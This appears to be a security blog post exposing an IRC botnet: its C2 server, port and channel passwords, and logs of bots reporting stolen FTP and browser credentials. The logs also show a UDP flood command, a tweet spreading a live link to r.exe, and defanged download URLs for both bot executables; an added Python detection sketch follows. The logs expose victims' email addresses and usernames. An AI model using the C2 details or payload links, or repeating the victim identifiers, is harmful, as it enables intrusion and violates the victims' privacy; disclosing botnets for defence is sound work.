kca.hopto.org (ngrbot and iRooT bot hosted by Turkey Balikesir Turk Telekomunikasyon Anonim Sirketi)

KCA botnet found by xDrulz (all logs come from him)
kca.hopto.org resolved to 88.255.116.48
Server: kca.hopto.org
Port: 1453
Channel:
Password: KCA
Botnick: {US|XP-32a}dwqeivt

Channel: #XXX
Password: KCA
Botnick: [iRooT-XP-USA]959715

Other channels: #s, #XX, #Okey

* Retrieving #Okey modes…
[14:21:06] * irc.ciftokey.com sets mode: +o Cihan
[14:22:31] <Cihan> .udp 91.229.35.79 5050 5
[14:49:34] <Cihan> .visit http://www.avdeposu.com.tr

Stealing FTP passwords

[19:32] <IRC> {US|XP-32a}dwqeivt: FileZilla -> 7 ser5.scottdalehosting5.com – 7 ptcmania : nope
[19:32] <IRC> {GE|XP-32a}elygxwn: FileZilla -> 7 kukaracha.ucoz.com – 7 dkukaracha :nope
[19:32] <IRC> {BR|XP-32a}kdqzbti: UDP flood on 7 200.50.224.64 for 7 60 seconds has finished.
[19:32] <IRC> {AR|W7-64u}jwhgdux: FileZilla -> 7 188.165.207.196 – 7 cristian : nope
[19:32] <IRC> {LT|XP-32a}vqkthfh: FileZilla -> 7 nkk.lt – 7 Controllers :nope
[19:32] <IRC> {GE|XP-32a}cksuemn: FileZilla -> 7 80.241.245.245 – 7 5555 : nope
[19:32] <IRC> {TR|XP-32a}ebogthv: FileZilla -> 7 mysql5.000webhost.com – 7 a3242683 : nope
[19:32] <IRC> {TR|XP-32a}ebogthv: FileZilla -> 7 mysql5.000webhost.com – 7 a3242683_forum :nope
[19:32] <IRC> {GE|XP-32a}cksuemn: FileZilla -> 7 80.241.255.255 – 7 5555 : nope
03[19:32] * Joins: {BA|W7-32u}nsnqdju (nsnqdju@59-127-242-80-gr.cable.dyn.broadband.blic.net)
[19:32] <IRC> {TR|XP-32a}ebogthv: FileZilla -> 7 a3242683_forum – 7 mysql5.000webhost.com : nope
[19:32] <IRC> {GE|XP-32a}cksuemn: FileZilla -> 7 80.241.255.255 – 7 5555 : nope
[19:32] <IRC> {TR|XP-32a}ebogthv: FileZilla -> 7 tekforum.comoj.com – 7 a3242683 :nope
[19:32] <IRC> {GE|XP-32a}cksuemn: FileZilla -> 7 luxserv.do.am – 7 8luxserv : nope
[19:32] <IRC> {BG|W7-32a}mblbsar: FileZilla -> 7 www.djshop.free.bg – 7 www.djshop.free.bg :nope
[19:32] <IRC> {BG|W7-32a}mblbsar: FileZilla -> 7 www.free.bg – 7 www.djshop.free.bg : nope
[19:32] <IRC> {BG|W7-32a}mblbsar: FileZilla -> 7 www.djshop.free.bg – 7 djshop : nope

Stealing browser passwords

[21:41] <IRC> {CZ|XP-32u}aslmqzz: Chrome -> 7 http://www.facebook.com/ -> 7 kacka.slajsova@seznam.cz : nope
[21:41] <IRC> {SK|W7-64u}aineytn: Chrome -> 7 http://oaprievidza.edupage.org/login/ -> 7 DenisaBlahová : nope
[21:41] <IRC> n{TH|XP-32a}pxsypum: Chrome -> 7 https://www.facebook.com/login.php -> 7 anniiza@hotmail.com : nope
[21:41] <IRC> {CZ|W7-64u}yizcpcd: Chrome -> 7 http://www.seznam.cz/ -> 7 michal.scoot : nope
[21:41] <IRC> {HU|W7-64u}ofcidiq: Chrome -> 7 http://www.mobiltelo.hu/belepes -> 7 mohalevi97@freemail.hu : nope
[21:41] <IRC> {BR|XP-32a}eucekhl: Chrome -> 7 https://twitter.com/download/ -> 7 matheus_porci14@yahoo.com.br : nope
[21:41] <IRC> {PL|W7-64u}rmjtugr: Chrome -> 7 https://fr.twitter.com/login/error -> 7 wisiaa1 : nope
[21:41] <IRC> {TH|W7-64a}jqrogpr: Chrome -> 7 https://apps.facebook.com/index.php -> 7 rosesfall_1981@hotmail.com : nope
[21:41] <IRC> n{TH|W7-32a}cabwbtk: Chrome -> 7 https://apps.facebook.com/index.php -> 7 nutstory-lf@hotmail.com : nope
[21:41] <IRC> {TH|W7-64a}qhcgslg: Chrome -> 7 http://apps.facebook.com/index.php -> 7 inventory-z@windowslive.com : nope
[21:41] <IRC> {VN|XP-32a}eycvlzu: Chrome -> 7 https://www.facebook.com/ -> 7 vietdd88@gmail.com :nope
[21:41] <IRC> n{BR|W7-32u}xysecqc: Chrome -> 7 http://208.115.228.199/index2.php -> 7 -Mooranguinha. : nope

Twitter spreading

[21:44] <IRC> {PL|W7-64u}sevlbfy: Twitter status updated: 7 dagmara123girl@gmail.com -> 7 😀 http://148.208.248.227/r.exe :D! .
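
A detection sketch for the nick formats and report lines seen in the logs above, added here as an example (it is not code from the original post or from either bot). The patterns are derived only from the nicks and messages shown on this page; the width allowed for the OS token, the function names and the sample lines are assumptions and constructed data.

```python
import re

# Nick shapes taken from the botnicks and channel logs on this page:
#   {US|XP-32a}dwqeivt   -> {CC|OS-bits + one letter} + 7 lowercase letters
#   [iRooT-XP-USA]959715 -> [iRooT-OS-CCC] + digits
# Assumption: the OS token is 2 to 4 upper-case letters/digits (page shows XP, W7).
NGR_NICK = re.compile(r"\{[A-Z]{2}\|[A-Z0-9]{2,4}-(?:32|64)[a-z]\}[a-z]{7}")
IROOT_NICK = re.compile(r"\[iRooT-[A-Z0-9]{2,4}-[A-Z]{3}\]\d+")

# Report messages the bots post to the channel, as they appear in the logs.
REPORTS = [
    ("credential_theft", re.compile(r": (FileZilla|Chrome) -> ")),
    ("ddos", re.compile(r": UDP flood on ")),
    ("spreading", re.compile(r": Twitter status updated: ")),
]

def classify(line):
    """Return (bot_family, nick, activity) for one IRC log line, or None."""
    for family, rx in (("ngrbot", NGR_NICK), ("iRooT", IROOT_NICK)):
        m = rx.search(line)
        if m:
            break
    else:
        return None  # no bot-style nick anywhere in the line
    activity = "presence"  # nick seen (join, NICK) without a report message
    rest = line[m.end():]
    for name, rx in REPORTS:
        if rx.match(rest):
            activity = name
            break
    return family, m.group(0), activity

def summarize(lines):
    """Map each bot nick to the set of activities observed for it."""
    seen = {}
    for line in lines:
        hit = classify(line)
        if hit:
            seen.setdefault(hit[1], set()).add(hit[2])
    return seen

# Constructed sample lines (placeholder hosts and accounts, not from the logs).
SAMPLE = [
    "[19:32] <IRC> {US|XP-32a}abcdefg: FileZilla -> 7 ftp.example.test - 7 user1 : nope",
    "[19:32] <IRC> {BR|W7-64u}hijklmn: UDP flood on 7 192.0.2.10 for 7 60 seconds has finished.",
    "03[19:33] * Joins: {US|XP-32a}abcdefg (abcdefg@host.example.test)",
    "[19:34] <alice> anyone tried the new mIRC build?",
    "NICK [iRooT-XP-USA]123456",
]
if __name__ == "__main__":
    print(summarize(SAMPLE))
```

The same patterns can be applied to NICK/JOIN fields in IRC protocol logs from a network sensor; a match on an internal host talking to a non-standard IRC port such as the 1453 listed above is worth triaging.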

Opers

03[19:16] * CaCa sets mode: +o DeLi
03[19:16] * CaCa sets mode: +o D|_PaLo
03[19:16] * CaCa sets mode: +o hx
03[19:16] * CaCa sets mode: +o Jorgee
03[19:16] * CaCa sets mode: +o st0n3d

ngrbot file: hxxp://www.pso-k.org/yes.exe

iRooT bot file: hxxp://www.pso-k.org/fb.exe

Hosting info: http://whois.domaintools.com/88.255.116.48
